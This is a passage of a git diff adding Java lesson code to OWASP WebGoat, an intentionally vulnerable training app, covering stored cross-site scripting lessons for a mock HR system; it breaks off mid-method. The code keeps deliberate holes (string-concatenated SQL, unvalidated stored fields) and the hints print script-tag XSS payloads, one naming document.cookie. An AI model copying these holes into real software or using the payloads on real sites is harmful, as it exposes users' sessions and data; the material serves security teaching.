+	String lastName = request.getParameter(CrossSiteScripting.LAST_NAME);
+	String ssn = request.getParameter(CrossSiteScripting.SSN);
+	String title = request.getParameter(CrossSiteScripting.TITLE);
+	String phone = request.getParameter(CrossSiteScripting.PHONE_NUMBER);
+	String address1 = request.getParameter(CrossSiteScripting.ADDRESS1);
+	String address2 = request.getParameter(CrossSiteScripting.ADDRESS2);
+	int manager = Integer.parseInt(request
+		.getParameter(CrossSiteScripting.MANAGER));
+	String startDate = request.getParameter(CrossSiteScripting.START_DATE);
+	int salary = Integer.parseInt(request
+		.getParameter(CrossSiteScripting.SALARY));
+	String ccn = request.getParameter(CrossSiteScripting.CCN);
+	int ccnLimit = Integer.parseInt(request
+		.getParameter(CrossSiteScripting.CCN_LIMIT));
+	String disciplinaryActionDate = request
+		.getParameter(CrossSiteScripting.DISCIPLINARY_DATE);
+	String disciplinaryActionNotes = request
+		.getParameter(CrossSiteScripting.DISCIPLINARY_NOTES);
+	String personalDescription = request
+		.getParameter(CrossSiteScripting.DESCRIPTION);
+
+	Employee employee = new Employee(subjectId, firstName, lastName, ssn,
+		title, phone, address1, address2, manager, startDate, salary,
+		ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
+		personalDescription);
+
+	return employee;
+    }
+
+
+    protected Employee parseEmployeeProfile_BACKUP(int subjectId, WebSession s)
+	    throws ParameterNotFoundException, ValidationException
+    {
+	// The input validation can be added using a parsing component 
+	// or by using an inline regular expression. The parsing component 
+	// is the better solution.
+
+	HttpServletRequest request = s.getRequest();
+	String firstName = request.getParameter(CrossSiteScripting.FIRST_NAME);
+	String lastName = request.getParameter(CrossSiteScripting.LAST_NAME);
+	String ssn = request.getParameter(CrossSiteScripting.SSN);
+	String title = request.getParameter(CrossSiteScripting.TITLE);
+	String phone = request.getParameter(CrossSiteScripting.PHONE_NUMBER);
+	String address1 = request.getParameter(CrossSiteScripting.ADDRESS1);
+	String address2 = request.getParameter(CrossSiteScripting.ADDRESS2);
+	int manager = Integer.parseInt(request
+		.getParameter(CrossSiteScripting.MANAGER));
+	String startDate = request.getParameter(CrossSiteScripting.START_DATE);
+	int salary = Integer.parseInt(request
+		.getParameter(CrossSiteScripting.SALARY));
+	String ccn = request.getParameter(CrossSiteScripting.CCN);
+	int ccnLimit = Integer.parseInt(request
+		.getParameter(CrossSiteScripting.CCN_LIMIT));
+	String disciplinaryActionDate = request
+		.getParameter(CrossSiteScripting.DISCIPLINARY_DATE);
+	String disciplinaryActionNotes = request
+		.getParameter(CrossSiteScripting.DISCIPLINARY_NOTES);
+	String personalDescription = request
+		.getParameter(CrossSiteScripting.DESCRIPTION);
+
+	Employee employee = new Employee(subjectId, firstName, lastName, ssn,
+		title, phone, address1, address2, manager, startDate, salary,
+		ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
+		personalDescription);
+
+	return employee;
+    }
+
+
+    protected Employee doParseEmployeeProfile(int subjectId,
+	    ParameterParser parser) throws ParameterNotFoundException,
+	    ValidationException
+    {
+	// Fix this method using the org.owasp.webgoat.session.ParameterParser class 
+	return null;
+    }
+
+
+    public String getNextPage(WebSession s)
+    {
+	return CrossSiteScripting.VIEWPROFILE_ACTION;
+    }
+
+
+    public void changeEmployeeProfile(WebSession s, int userId, int subjectId,
+	    Employee employee) throws UnauthorizedException
+    {
+	try
+	{
+	    // Note: The password field is ONLY set by ChangePassword
+			String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
+				+ " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
+				+ " personal_description = ? WHERE userid = ?;";
+	    try
+	    {
+			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+
+			ps.setString(1, employee.getFirstName());
+			ps.setString(2, employee.getLastName());
+			ps.setString(3, employee.getSsn());
+			ps.setString(4, employee.getTitle());
+			ps.setString(5, employee.getPhoneNumber());
+			ps.setString(6, employee.getAddress1());
+			ps.setString(7, employee.getAddress2());
+			ps.setInt(8, employee.getManager());
+			ps.setString(9, employee.getStartDate());
+			ps.setString(10, employee.getCcn());
+			ps.setInt(11, employee.getCcnLimit());
+			ps.setString(12, employee.getPersonalDescription());
+			ps.setInt(13, subjectId);
+			ps.execute();
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error updating employee profile");
+		sqle.printStackTrace();
+	    }
+
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error updating employee profile");
+	    e.printStackTrace();
+	}
+    }
+
+
+    public void doChangeEmployeeProfile_BACKUP(WebSession s, int userId,
+	    int subjectId, Employee employee) throws UnauthorizedException
+    {
+	try
+	{
+	    // Note: The password field is ONLY set by ChangePassword
+			String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
+				+ " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
+				+ " personal_description = ? WHERE userid = ?;";
+	    try
+	    {
+			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+
+			ps.setString(1, employee.getFirstName());
+			ps.setString(2, employee.getLastName());
+			ps.setString(3, employee.getSsn());
+			ps.setString(4, employee.getTitle());
+			ps.setString(5, employee.getPhoneNumber());
+			ps.setString(6, employee.getAddress1());
+			ps.setString(7, employee.getAddress2());
+			ps.setInt(8, employee.getManager());
+			ps.setString(9, employee.getStartDate());
+			ps.setString(10, employee.getCcn());
+			ps.setInt(11, employee.getCcnLimit());
+			ps.setString(12, employee.getPersonalDescription());
+			ps.setInt(13, subjectId);
+			ps.executeUpdate(query);
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error updating employee profile");
+		sqle.printStackTrace();
+	    }
+
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error updating employee profile");
+	    e.printStackTrace();
+	}
+    }
+
+
+    public void createEmployeeProfile(WebSession s, int userId,
+	    Employee employee) throws UnauthorizedException
+    {
+	try
+	{
+	    // FIXME: Cannot choose the id because we cannot guarantee uniqueness
+		int nextId = getNextUID(s);
+	    String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
+
+	    //System.out.println("Query:  " + query);
+
+	    try
+	    {
+			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
+
+			ps.setString(1, employee.getFirstName().toLowerCase());
+			ps.setString(2, employee.getLastName());
+			ps.setString(3, employee.getSsn());
+			ps.setString(4, employee.getTitle());
+			ps.setString(5, employee.getPhoneNumber());
+			ps.setString(6, employee.getAddress1());
+			ps.setString(7, employee.getAddress2());
+			ps.setInt(8, employee.getManager());
+			ps.setString(9, employee.getStartDate());
+			ps.setString(10, employee.getCcn());
+			ps.setInt(11, employee.getCcnLimit());
+			ps.setString(12, employee.getDisciplinaryActionDate());
+			ps.setString(13, employee.getDisciplinaryActionNotes());
+			ps.setString(14, employee.getPersonalDescription());
+
+			ps.execute();
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error updating employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error updating employee profile");
+	    e.printStackTrace();
+	}
+    }
+
+
+    public void createEmployeeProfile_BACKUP(WebSession s, int userId,
+	    Employee employee) throws UnauthorizedException
+    {
+	try
+	{
+	    // FIXME: Cannot choose the id because we cannot guarantee uniqueness
+			int nextId = getNextUID(s);
+		    String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
+
+	    //System.out.println("Query:  " + query);
+
+	    try
+	    {
+			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
+
+			ps.setString(1, employee.getFirstName().toLowerCase());
+			ps.setString(2, employee.getLastName());
+			ps.setString(3, employee.getSsn());
+			ps.setString(4, employee.getTitle());
+			ps.setString(5, employee.getPhoneNumber());
+			ps.setString(6, employee.getAddress1());
+			ps.setString(7, employee.getAddress2());
+			ps.setInt(8, employee.getManager());
+			ps.setString(9, employee.getStartDate());
+			ps.setString(10, employee.getCcn());
+			ps.setInt(11, employee.getCcnLimit());
+			ps.setString(12, employee.getDisciplinaryActionDate());
+			ps.setString(13, employee.getDisciplinaryActionNotes());
+			ps.setString(14, employee.getPersonalDescription());
+
+			ps.execute();
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error updating employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error updating employee profile");
+	    e.printStackTrace();
+	}
+    }
+
+
+    /**
+     * Validates that the given parameter value matches the given regular expression pattern.
+     * 
+     * @param parameter
+     * @param pattern
+     * @return
+     * @throws ValidationException
+     */
+    protected String validate(final String parameter, final Pattern pattern)
+	    throws ValidationException
+    {
+	Matcher matcher = pattern.matcher(parameter);
+	if (!matcher.matches())
+	    throw new ValidationException();
+
+	return parameter;
+    }
+
+    private int getNextUID(WebSession s)
+    {
+	int uid = -1;
+	try
+	{
+	    Statement statement = WebSession.getConnection(s).createStatement(
+		    ResultSet.TYPE_SCROLL_INSENSITIVE,
+		    ResultSet.CONCUR_READ_ONLY);
+	    ResultSet results = statement
+		    .executeQuery("select max(userid) as uid from employee");
+	    results.first();
+	    uid = results.getInt("uid");
+	}
+	catch (SQLException sqle)
+	{
+	    sqle.printStackTrace();
+	    s.setMessage("Error updating employee profile");
+	}
+	catch (ClassNotFoundException e)
+	{
+	    // TODO Auto-generated catch block
+	    e.printStackTrace();
+	}
+	return uid + 1;
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java
new file mode 100644
index 000000000..c694b93ba
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java
@@ -0,0 +1,252 @@
+package org.owasp.webgoat.lessons.CrossSiteScripting;
+
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class ViewProfile extends DefaultLessonAction
+{
+
+    public ViewProfile(GoatHillsFinancial lesson, String lessonName,
+	    String actionName)
+    {
+	super(lesson, lessonName, actionName);
+    }
+
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    UnauthenticatedException, UnauthorizedException,
+	    ValidationException
+    {
+	getLesson().setCurrentAction(s, getActionName());
+
+	if (isAuthenticated(s))
+	{
+	    int userId = getIntSessionAttribute(s, getLessonName() + "."
+		    + CrossSiteScripting.USER_ID);
+	    int employeeId = -1;
+	    try
+	    {
+		// User selected employee
+		employeeId = s.getParser().getIntParameter(
+			CrossSiteScripting.EMPLOYEE_ID);
+	    }
+	    catch (ParameterNotFoundException e)
+	    {
+		// May be an internally selected employee
+		employeeId = getIntRequestAttribute(s, getLessonName() + "."
+			+ CrossSiteScripting.EMPLOYEE_ID);
+	    }
+
+	    Employee employee = getEmployeeProfile(s, userId, employeeId);
+	    setSessionAttribute(s, getLessonName() + "."
+		    + CrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY, employee);
+
+	    updateLessonStatus(s, employee);
+	}
+	else
+	    throw new UnauthenticatedException();
+    }
+
+
+    public String getNextPage(WebSession s)
+    {
+	return CrossSiteScripting.VIEWPROFILE_ACTION;
+    }
+
+
+    public Employee getEmployeeProfile(WebSession s, int userId,
+	    int subjectUserId) throws UnauthorizedException
+    {
+	Employee profile = null;
+
+	// Query the database for the profile data of the given employee
+	try
+	{
+	    String query = "SELECT * FROM employee WHERE userid = "
+		    + subjectUserId;
+
+	    try
+	    {
+		Statement answer_statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(query);
+		if (answer_results.next())
+		{
+		    // Note: Do NOT get the password field.
+		    profile = new Employee(answer_results.getInt("userid"),
+			    answer_results.getString("first_name"),
+			    answer_results.getString("last_name"),
+			    answer_results.getString("ssn"), answer_results
+				    .getString("title"), answer_results
+				    .getString("phone"), answer_results
+				    .getString("address1"), answer_results
+				    .getString("address2"), answer_results
+				    .getInt("manager"), answer_results
+				    .getString("start_date"), answer_results
+				    .getInt("salary"), answer_results
+				    .getString("ccn"), answer_results
+				    .getInt("ccn_limit"), answer_results
+				    .getString("disciplined_date"),
+			    answer_results.getString("disciplined_notes"),
+			    answer_results.getString("personal_description"));
+		    /*					System.out.println("Retrieved employee from db: " + 
+		     profile.getFirstName() + " " + profile.getLastName() + 
+		     " (" + profile.getId() + ")");
+		     */}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employee profile");
+	    e.printStackTrace();
+	}
+
+	return profile;
+    }
+
+
+    public Employee getEmployeeProfile_BACKUP(WebSession s, int userId,
+	    int subjectUserId) throws UnauthorizedException
+    {
+	// Query the database to determine if this employee has access to this function
+	// Query the database for the profile data of the given employee if "owned" by the given user
+
+	Employee profile = null;
+
+	// Query the database for the profile data of the given employee
+	try
+	{
+	    String query = "SELECT * FROM employee WHERE userid = "
+		    + subjectUserId;
+
+	    try
+	    {
+		Statement answer_statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(query);
+		if (answer_results.next())
+		{
+		    // Note: Do NOT get the password field.
+		    profile = new Employee(answer_results.getInt("userid"),
+			    answer_results.getString("first_name"),
+			    answer_results.getString("last_name"),
+			    answer_results.getString("ssn"), answer_results
+				    .getString("title"), answer_results
+				    .getString("phone"), answer_results
+				    .getString("address1"), answer_results
+				    .getString("address2"), answer_results
+				    .getInt("manager"), answer_results
+				    .getString("start_date"), answer_results
+				    .getInt("salary"), answer_results
+				    .getString("ccn"), answer_results
+				    .getInt("ccn_limit"), answer_results
+				    .getString("disciplined_date"),
+			    answer_results.getString("disciplined_notes"),
+			    answer_results.getString("personal_description"));
+		    /*					System.out.println("Retrieved employee from db: " + 
+		     profile.getFirstName() + " " + profile.getLastName() + 
+		     " (" + profile.getId() + ")");
+		     */}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employee profile");
+	    e.printStackTrace();
+	}
+
+	return profile;
+    }
+
+
+    private void updateLessonStatus(WebSession s, Employee employee)
+    {
+	String stage = getStage(s);
+	int userId = -1;
+	try {
+		userId = getIntSessionAttribute(s, getLessonName() + "."
+		    + CrossSiteScripting.USER_ID);
+	} catch (ParameterNotFoundException pnfe) {
+	}
+	if (CrossSiteScripting.STAGE1.equals(stage))
+	{
+		String address1 = employee.getAddress1().toLowerCase();
+		if (userId != employee.getId()
+			&& address1.indexOf("<script>") > -1
+			&& address1.indexOf("alert") > -1
+			&& address1.indexOf("</script>") > -1)
+		{
+		    setStageComplete(s, CrossSiteScripting.STAGE1);
+		}
+	}
+	else if (CrossSiteScripting.STAGE3.equals(stage))
+	{
+		String address2 = employee.getAddress1().toLowerCase();
+		if (address2.indexOf("<script>") > -1
+			&& address2.indexOf("alert") > -1
+			&& address2.indexOf("</script>") > -1)
+		{
+		    setStageComplete(s, CrossSiteScripting.STAGE3);
+		}
+	}
+	else if (CrossSiteScripting.STAGE4.equals(stage))
+	{
+		if (employee.getAddress1().toLowerCase().indexOf("&lt;") > -1)
+		{
+		    setStageComplete(s, CrossSiteScripting.STAGE4);
+		}
+	}
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java
new file mode 100755
index 000000000..5832ccc29
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java
@@ -0,0 +1,261 @@
+package org.owasp.webgoat.lessons.DBCrossSiteScripting;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.ElementContainer;
+import org.owasp.webgoat.lessons.Category;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DeleteProfile;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.EditProfile;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.FindProfile;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.ListStaff;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.Login;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.Logout;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.SearchStaff;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.ViewProfile;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/**
+ /*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ */
+public class DBCrossSiteScripting extends GoatHillsFinancial
+{
+    private final static Integer DEFAULT_RANKING = new Integer(100);
+
+    public final static String STAGE1 = "Stored XSS";
+    
+    public final static String STAGE2 = "Block Stored XSS using DB Input Validation";
+    
+    protected void registerActions(String className)
+    {
+	registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
+	registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
+	registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
+	registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
+	registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
+
+	// These actions are special in that they chain to other actions.
+	registerAction(new Login(this, className, LOGIN_ACTION,
+		getAction(LISTSTAFF_ACTION)));
+	registerAction(new Logout(this, className, LOGOUT_ACTION,
+		getAction(LOGIN_ACTION)));
+	registerAction(new FindProfile(this, className, FINDPROFILE_ACTION,
+		getAction(VIEWPROFILE_ACTION)));
+	registerAction(new UpdateProfile(this, className,
+		UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
+	registerAction(new DeleteProfile(this, className,
+		DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
+    }
+
+    /**
+     *  Gets the category attribute of the CrossSiteScripting object
+     *
+     * @return    The category value
+     */
+    public Category getDefaultCategory()
+    {
+	return Category.XSS;
+    }
+
+    /**
+     *  Gets the hints attribute of the DirectoryScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+
+	// Stage 1
+	hints.add("You can put HTML tags in form input fields.");
+	hints
+		.add("Bury a SCRIPT tag in the field to attack anyone who reads it.");
+	hints
+		.add("Enter this: &lt;script language=\"javascript\" type=\"text/javascript\"&gt;alert(\"Ha Ha Ha\");&lt;/script&gt; in message fields.");
+	hints
+		.add("Enter this: &lt;script&gtalert(\"document.cookie\");&lt;/script&gt; in message fields.");
+
+	// Stage 2
+	hints
+		.add("Many scripts rely on the use of special characters such as: &lt;");
+	hints
+		.add("Allowing only a certain set of characters (positive filtering) is preferred to blocking a set of characters (negative filtering).");
+	hints
+		.add("Oracle 10 supports a regular expression matching function : REGEXP_LIKE(text, pattern).");
+
+	return hints;
+    }
+
+
+    /**
+     *  Gets the instructions attribute of the ParameterInjection object
+     *
+     * @return    The instructions value
+     */
+    public String getInstructions(WebSession s)
+    {
+	String instructions = "";
+
+	if (!getLessonTracker(s).getCompleted())
+	{
+		String stage = getStage(s);
+		if (STAGE1.equals(stage))
+	    {
+		    instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.<br>"
+			    + "As 'Tom', execute a Stored XSS attack against the Street field on the Edit Profile page.  "
+			    + "Verify that 'Jerry' is affected by the attack. "
+			    + "A sample JavaScript snippet you can use is: &lt;SCRIPT&gt;alert('bang!');&lt;/SCRIPT&gt;.";
+	    }
+		else if (STAGE2.equals(stage))
+		{
+		    instructions = "Stage 2: Block Stored XSS using Input Validation.<br>"
+			    + "Implement a fix in the stored procedure to prevent the stored XSS from being written to the database. ";
+		    if (getWebgoatContext().getDatabaseDriver().contains("jtds"))
+		    	instructions += "Use the provided user-defined function RegexMatch to test the data against a pattern. ";
+			instructions += "A sample regular expression pattern: ^[a-zA-Z0-9,\\. ]{0,80}$ "
+			    + "Repeat stage 1 as 'Eric' with 'David' as the manager.  Verify that 'David' is not affected by the attack.";
+		}
+	}
+
+	return instructions;
+
+    }
+
+    @Override
+	public String[] getStages() {
+    	if (getWebgoatContext().isCodingExercises())
+    		return new String[] {STAGE1, STAGE2};
+    	return new String[] {STAGE1};
+	}
+
+    public void handleRequest(WebSession s)
+    {
+	if (s.getLessonSession(this) == null)
+	    s.openLessonSession(this);
+
+	String requestedActionName = null;
+	try
+	{
+	    requestedActionName = s.getParser().getStringParameter("action");
+	}
+	catch (ParameterNotFoundException pnfe)
+	{
+	    // Let them eat login page.
+	    requestedActionName = LOGIN_ACTION;
+	}
+
+	if (requestedActionName != null)
+	{
+	    try
+	    {
+		LessonAction action = getAction(requestedActionName);
+
+		if (action != null)
+		{
+		    if (!action.requiresAuthentication()
+			    || action.isAuthenticated(s))
+		    {
+			action.handleRequest(s);
+			//setCurrentAction(s, action.getNextPage(s));
+		    }
+		}
+		else
+		{
+		    setCurrentAction(s, ERROR_ACTION);
+		}
+	    }
+	    catch (ParameterNotFoundException pnfe)
+	    {
+		System.out.println("Missing parameter");
+		pnfe.printStackTrace();
+		setCurrentAction(s, ERROR_ACTION);
+	    }
+	    catch (ValidationException ve)
+	    {
+		System.out.println("Validation failed");
+		ve.printStackTrace();
+		setCurrentAction(s, ERROR_ACTION);
+	    }
+	    catch (UnauthenticatedException ue)
+	    {
+		s.setMessage("Login failed");
+		System.out.println("Authentication failure");
+		ue.printStackTrace();
+	    }
+	    catch (UnauthorizedException ue2)
+	    {
+		s.setMessage("You are not authorized to perform this function");
+		System.out.println("Authorization failure");
+		ue2.printStackTrace();
+	    }
+	    catch (Exception e)
+	    {
+		// All other errors send the user to the generic error page
+		System.out.println("handleRequest() error");
+		e.printStackTrace();
+		setCurrentAction(s, ERROR_ACTION);
+	    }
+	}
+
+	// All this does for this lesson is ensure that a non-null content exists.
+	setContent(new ElementContainer());
+    }
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the CrossSiteScripting object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return "LAB: DB Cross Site Scripting (XSS)";
+    }
+
+	@Override
+	protected boolean getDefaultHidden() {
+		String driver = getWebgoatContext().getDatabaseDriver();
+		boolean hidden = ! (driver.contains("oracle") || driver.contains("jtds"));
+		return hidden;
+	}
+
+}
\ No newline at end of file
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java
new file mode 100755
index 000000000..a09008621
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java
@@ -0,0 +1,268 @@
+package org.owasp.webgoat.lessons.DBCrossSiteScripting;
+
+import java.sql.CallableStatement;
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+
+import javax.servlet.http.HttpServletRequest;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl;
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class UpdateProfile extends DefaultLessonAction
+{
+
+    private LessonAction chainedAction;
+
+
+    public UpdateProfile(GoatHillsFinancial lesson, String lessonName,
+	    String actionName, LessonAction chainedAction)
+    {
+	super(lesson, lessonName, actionName);
+	this.chainedAction = chainedAction;
+    }
+
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    UnauthenticatedException, UnauthorizedException,
+	    ValidationException
+    {
+	if (isAuthenticated(s))
+	{
+	    int userId = getIntSessionAttribute(s, getLessonName() + "."
+			    + RoleBasedAccessControl.USER_ID);
+
+		HttpServletRequest request = s.getRequest();
+		int subjectId = Integer.parseInt(request.getParameter(DBCrossSiteScripting.EMPLOYEE_ID));
+		String firstName = request.getParameter(DBCrossSiteScripting.FIRST_NAME);
+		String lastName = request.getParameter(DBCrossSiteScripting.LAST_NAME);
+		String ssn = request.getParameter(DBCrossSiteScripting.SSN);
+		String title = request.getParameter(DBCrossSiteScripting.TITLE);
+		String phone = request.getParameter(DBCrossSiteScripting.PHONE_NUMBER);
+		String address1 = request.getParameter(DBCrossSiteScripting.ADDRESS1);
+		String address2 = request.getParameter(DBCrossSiteScripting.ADDRESS2);
+		int manager = Integer.parseInt(request
+			.getParameter(DBCrossSiteScripting.MANAGER));
+		String startDate = request.getParameter(DBCrossSiteScripting.START_DATE);
+		int salary = Integer.parseInt(request
+			.getParameter(DBCrossSiteScripting.SALARY));
+		String ccn = request.getParameter(DBCrossSiteScripting.CCN);
+		int ccnLimit = Integer.parseInt(request
+			.getParameter(DBCrossSiteScripting.CCN_LIMIT));
+		String disciplinaryActionDate = request
+			.getParameter(DBCrossSiteScripting.DISCIPLINARY_DATE);
+		String disciplinaryActionNotes = request
+			.getParameter(DBCrossSiteScripting.DISCIPLINARY_NOTES);
+		String personalDescription = request
+			.getParameter(DBCrossSiteScripting.DESCRIPTION);
+
+		Employee employee = new Employee(subjectId, firstName, lastName, ssn,
+			title, phone, address1, address2, manager, startDate, salary,
